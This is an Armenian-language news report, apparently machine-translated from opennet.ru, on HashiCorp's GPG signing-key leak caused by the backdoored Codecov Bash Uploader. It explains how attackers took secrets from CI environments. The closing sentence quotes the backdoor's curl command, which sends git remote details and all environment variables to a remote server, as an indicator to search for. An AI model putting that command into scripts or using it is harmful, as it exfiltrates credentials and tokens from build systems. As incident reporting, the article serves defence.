HashiCorp-ը, որը հայտնի է Vagrant, Packer, Nomad և Terraform բաց կոդով գործիքների մշակմամբ, հայտարարեց մասնավոր GPG բանալի արտահոսքի մասին, որն օգտագործվում էր թողարկումները ստուգող թվային ստորագրություններ ստեղծելու համար: Հարձակվողները, ովքեր մուտք են ստացել GPG ստեղնը, կարող են պոտենցիալ թաքնված փոփոխություններ կատարել HashiCorp-ի արտադրանքներում՝ ստուգելով դրանք ճիշտ թվային ստորագրությամբ: Միաժամանակ ընկերությունը հայտարարել է, որ աուդիտի ընթացքում նման փոփոխություններ կատարելու փորձերի հետքեր չեն հայտնաբերվել։
Ներկայումս վտանգված GPG ստեղնը չեղյալ է հայտարարվել, և դրա փոխարեն նոր բանալի է ներդրվել: Խնդիրն ազդել է միայն SHA256SUM և SHA256SUM.sig ֆայլերի միջոցով ստուգման վրա և չի ազդել Linux DEB և RPM փաթեթների համար թվային ստորագրությունների առաջացման վրա, որոնք մատակարարվում են releases.hashicorp.com-ի միջոցով, ինչպես նաև macOS-ի և Windows-ի թողարկման ստուգման մեխանիզմների վրա (AuthentiCode) .
Արտահոսքը տեղի է ունեցել ենթակառուցվածքում Codecov Bash Uploader (codecov-bash) սկրիպտի օգտագործման պատճառով, որը նախատեսված է շարունակական ինտեգրման համակարգերից ծածկույթի մասին հաշվետվություններ ներբեռնելու համար: Codecov ընկերության վրա հարձակման ժամանակ նշված սկրիպտում թաքնվել է հետնադուռ, որի միջոցով գաղտնաբառերը և կոդավորման բանալիներն ուղարկվել են հարձակվողների սերվերին:
Կոտրելու համար հարձակվողներն օգտվեցին Codecov Docker պատկերի ստեղծման գործընթացում տեղի ունեցած սխալից, որը հնարավորություն տվեց արդյունահանել մուտքի տվյալները GCS (Google Cloud Storage)՝ անհրաժեշտ փոփոխություններ կատարելու Bash Uploader սկրիպտում, որը բաշխված է codecov-ից: io կայքը: Փոփոխությունները կատարվել են դեռևս հունվարի 31-ին, երկու ամիս շարունակ անհայտ մնացին և հարձակվողներին թույլ տվեցին կորզել տեղեկատվությունը, որը պահվում է հաճախորդների շարունակական ինտեգրման համակարգի միջավայրերում: Օգտագործելով ավելացված վնասակար կոդը՝ հարձակվողները կարող են տեղեկատվություն ստանալ փորձարկված Git պահոցի և շրջակա միջավայրի բոլոր փոփոխականների մասին, ներառյալ նշանները, կոդավորման բանալիները և գաղտնաբառերը, որոնք փոխանցվում են շարունակական ինտեգրացիոն համակարգերին՝ կազմակերպելու մուտքը դեպի հավելվածի կոդ, պահեստներ և ծառայություններ, ինչպիսիք են Amazon Web Services-ը և GitHub-ը: .
Բացի ուղիղ զանգից, Codecov Bash Uploader սկրիպտը օգտագործվել է որպես այլ վերբեռնիչների մաս, ինչպիսիք են Codecov-action (Github), Codecov-circleci-orb և Codecov-bitrise-step, որոնց օգտատերերը նույնպես ազդում են խնդրի վրա: Codecov-bash-ի և հարակից արտադրանքի բոլոր օգտագործողներին խորհուրդ է տրվում ստուգել իրենց ենթակառուցվածքները, ինչպես նաև փոխել գաղտնաբառերը և կոդավորման բանալիները: Դուք կարող եք ստուգել սկրիպտում ետնադռան առկայությունը curl -sm 0.5 -d «$(git remote -v)<<<<<< ENV $(env)» տողի առկայությամբ: /վերբեռնում/v2 || ճիշտ
Source: opennet.ru